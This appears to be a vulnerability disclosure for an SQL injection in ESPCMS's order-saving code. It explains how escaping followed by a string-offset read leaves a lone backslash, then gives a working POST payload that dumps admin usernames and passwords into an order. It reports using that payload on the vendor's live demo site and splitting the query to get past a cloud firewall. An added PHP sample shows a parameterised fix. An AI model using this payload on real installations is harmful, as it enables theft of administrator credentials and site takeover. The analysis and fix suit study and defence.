Yisi ESPCMS SQL injection vulnerability (bypassing Aliyun Shield on the demo site to obtain a shell)

Vulnerability author:

路人甲

Details:

/interface/order.php

$db_values = '';
$arraycount = count($did) - 1;
foreach ($did as $key => $value) {
    $value = intval($value);
    $oprice[$key] = floatval($oprice[$key]);
    $bprice[$key] = floatval($bprice[$key]);
    $countprice[$key] = floatval($countprice[$key]);
    $amount[$key] = intval($amount[$key]);
    // $tsn[$key] and $ptitle[$key] are interpolated into the SQL text as-is
    if ($key == $arraycount) {
        $db_values .= "($insert_id,$value,'$tsn[$key]','$ptitle[$key]',$oprice[$key],$bprice[$key],$countprice[$key],$amount[$key],1)";
    } else {
        $db_values .= "($insert_id,$value,'$tsn[$key]','$ptitle[$key]',$oprice[$key],$bprice[$key],$countprice[$key],$amount[$key],1),";
    }
}
$db_field = 'oid,did,tsn,title,oprice,bprice,countprice,amount,inventory';
$this->db->query('INSERT INTO ' . $db_table2 . ' (' . $db_field . ') VALUES ' . $db_values);


Both $ptitle and $tsn are user-controlled and are concatenated straight into the INSERT statement.

A normal submission looks like this:

POST /index.php?ac=order&at=ordersave HTTP/1.1
Host: demo.ecisp.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://demo.ecisp.cn/index.php?ac=order&at=orderpay
Cookie: /**/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 426

userid=409&productmoney=33600&discount_productmoney=33600&discountmoney=0&tokenkey=98b9b2dbbda63c317b3f9ab9c370a47b&ptitle%5B%5D=ESPCMS%E5%BC%80%E5%8F%91%E7%89%88&tsn%5B%5D=SN20140706215345387&bprice%5B%5D=16800.00&oprice%5B%5D=16800.00&did%5B%5D=30&amount%5B%5D=2&countprice%5B%5D=33600.00&osid=1&opid=1&alias=wooyun&sex=0&email=asd%40qq.com&tel=123&mobile=123&address=test&zipcode=0&sendtime=1&content=&invpayee=&invcontent=

$ptitle = $this->fun->accept('ptitle', 'P');
$tsn = $this->fun->accept('tsn', 'P');


Let's look at accept():

function accept($k, $var = 'R', $htmlcode = true, $rehtml = false) {
    switch ($var) {
        case 'G':
            $var = &$_GET;
            break;
        case 'P':
            $var = &$_POST;
            break;
        case 'C':
            $var = &$_COOKIE;
            break;
        case 'R':
            $var = &$_GET;
            if (empty($var[$k])) {
                $var = &$_POST;
            }
            break;
    }
    // the raw value is escaped once here, whether it is a scalar or an array
    $putvalue = isset($var[$k]) ? $this->daddslashes($var[$k], 0) : NULL;
    return $htmlcode ? ($rehtml ? $this->preg_htmldecode($putvalue) : $this->htmldecode($putvalue)) : $putvalue;
}


The submitted data is escaped here, but when $tsn is not an array, indexing it behaves like this:

$temp = "wooyun"

The value of $temp[0] is w

Payload construction:

Submit a single ' as the $tsn parameter; daddslashes (ESPCMS's rewrite of addslashes) escapes it to \'

Reading $tsn[0] then yields a lone \

userid=1&productmoney=16800&discount_productmoney=16800&discountmoney=0&ptitle[]=,(SELECT CONCAT(USERNAME,0x2f,PASSWORD) FROM espcms_admin_member ),1,1,1,1,1)#&tsn='&bprice[]=16800.00&oprice[]=16800.00&did[]=30&amount[]=1&countprice[]=16800.00&osid=1&opid=1&alias=wooyun&sex=0&email=awsedr@q.com&tel=10010&mobile=&address=china&zipcode=0&sendtime=1&content=&invpayee=&invcontent=

Viewing the order:

[screenshot of the order page; image not included]

The resulting SQL statement is equivalent to:

INSERT INTO espcms_order_info (oid,did,tsn,title,oprice,bprice,countprice,amount,inventory) VALUES (10,30,'\',',(SELECT CONCAT(USERNAME,0x2f,PASSWORD) FROM espcms_admin_member ),1,1,1,1,1)#',16800,16800,16800,1,1)
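
As an added defender-side example (not ESPCMS's own code), the PHP below reproduces the root cause described above and sets a hardened insert beside it. It assumes PDO with the sqlite driver for an in-memory demo, uses plain addslashes() in place of the project's daddslashes() wrapper, and the order_info table, its schema and every sample value are constructed for the demo.

```php
<?php
// Added example for this write-up; it is not ESPCMS code. It reproduces the
// two conditions behind the bug (escaping with addslashes(), then reading a
// string offset as if it were an array element) and shows an input-validating,
// parameterised replacement for the INSERT. Table name, schema and sample
// values are constructed; addslashes() stands in for daddslashes().

// Why the escaping did not help: the whole scalar is escaped, but the builder
// then reads $tsn[$key]. On a string that is a string-offset read, so the
// escaped "\'" collapses to a lone backslash.
function escapedThenIndexed(string $scalar): string
{
    $escaped = addslashes($scalar);   // "'" becomes "\'"
    return $escaped[0];               // first character only
}

// Builder in the style of the vulnerable code, kept only to show the effect.
function buildUnsafeValues(int $oid, array $did, $tsn, array $ptitle): string
{
    $parts = [];
    foreach ($did as $k => $v) {
        $parts[] = sprintf("(%d,%d,'%s','%s')", $oid, intval($v), $tsn[$k], $ptitle[$k]);
    }
    return implode(',', $parts);
}

// Hardened builder: require parallel arrays of equal length, then let PDO
// bind every value so the SQL text never contains user data.
function insertOrderItems(PDO $db, int $oid, array $post): int
{
    $lists = ['did', 'tsn', 'ptitle', 'oprice', 'bprice', 'countprice', 'amount'];
    foreach ($lists as $name) {
        if (!isset($post[$name]) || !is_array($post[$name])) {
            throw new InvalidArgumentException("$name must be an array");
        }
        if (count($post[$name]) !== count($post['did'])) {
            throw new InvalidArgumentException("$name length does not match did");
        }
    }
    $stmt = $db->prepare(
        'INSERT INTO order_info (oid,did,tsn,title,oprice,bprice,countprice,amount,inventory)
         VALUES (:oid,:did,:tsn,:title,:oprice,:bprice,:countprice,:amount,1)'
    );
    $db->beginTransaction();
    foreach (array_keys($post['did']) as $k) {
        $stmt->execute([
            ':oid'        => $oid,
            ':did'        => intval($post['did'][$k]),
            ':tsn'        => (string) $post['tsn'][$k],     // bound, not interpolated
            ':title'      => (string) $post['ptitle'][$k],
            ':oprice'     => floatval($post['oprice'][$k]),
            ':bprice'     => floatval($post['bprice'][$k]),
            ':countprice' => floatval($post['countprice'][$k]),
            ':amount'     => intval($post['amount'][$k]),
        ]);
    }
    $db->commit();
    return count($post['did']);
}

// --- demo ---------------------------------------------------------------
echo escapedThenIndexed("'"), "\n";                       // prints \
echo buildUnsafeValues(10, [30], addslashes("'"), ['abc']), "\n";
// prints (10,30,'\','abc') : the backslash escapes tsn's closing quote, so the
// literal runs on to the next quote and 'abc' ends up outside any string

$db = new PDO('sqlite::memory:');                         // constructed schema
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE order_info (oid INT, did INT, tsn TEXT, title TEXT,
           oprice REAL, bprice REAL, countprice REAL, amount INT, inventory INT)');

$base = ['did' => [30], 'ptitle' => ['abc'], 'oprice' => [16800.00],
         'bprice' => [16800.00], 'countprice' => [16800.00], 'amount' => [1]];
try {
    insertOrderItems($db, 10, $base + ['tsn' => "'"]);     // scalar tsn, as in the write-up
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";             // tsn must be an array
}
$n = insertOrderItems($db, 10, $base + ['tsn' => ["'),1"]]);
echo "stored $n row; tsn kept literally: ",
     $db->query('SELECT tsn FROM order_info')->fetchColumn(), "\n";
```

The type check matters as much as the prepared statement: is_array() closes the string-offset path that turned \' into \, and binding closes the concatenation path, so neither half of the original bug survives even if one of the two fixes is later removed.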
 

Testing on the official demo:

Because the official demo sits behind Alibaba's firewall, I retrieved the data in two passes.

First query:
SELECT USERNAME FROM espcms_admin_member
Second query:
SELECT PASSWORD FROM espcms_admin_member

[screenshot of the demo-site result; image not included]
